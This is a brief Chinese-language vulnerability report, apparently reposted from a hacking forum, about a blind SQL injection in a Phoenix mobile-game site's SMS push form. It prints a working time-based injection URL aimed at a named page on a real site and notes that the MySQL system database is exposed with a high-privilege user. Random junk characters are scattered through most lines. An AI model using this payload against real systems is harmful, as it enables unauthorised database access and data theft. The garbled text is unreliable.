简要描述:
+ q$ T; d5 {; ]* x凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。
( m% H+ `* t7 V, k. A
0 y+ x2 F0 y! d8 d2 F; B详细说明:
M5 F4 W( A+ A0 r存在SQL盲注url:
% j# x4 {! G/ _6 q2 i; Yfenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1
- ~- l2 C( @7 b$ c/ W" [http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png* M- w5 q0 t/ U2 J
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png k" v* Q( P; C9 X( f
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg
! n( p9 R( V( J1 B# j& M6 Y5 x8 Y6 e" h
: g) c) x" l) K3 Q+ e# F' g# N* d能看到mysql系统数据库,看来user权限应该很高的。。 |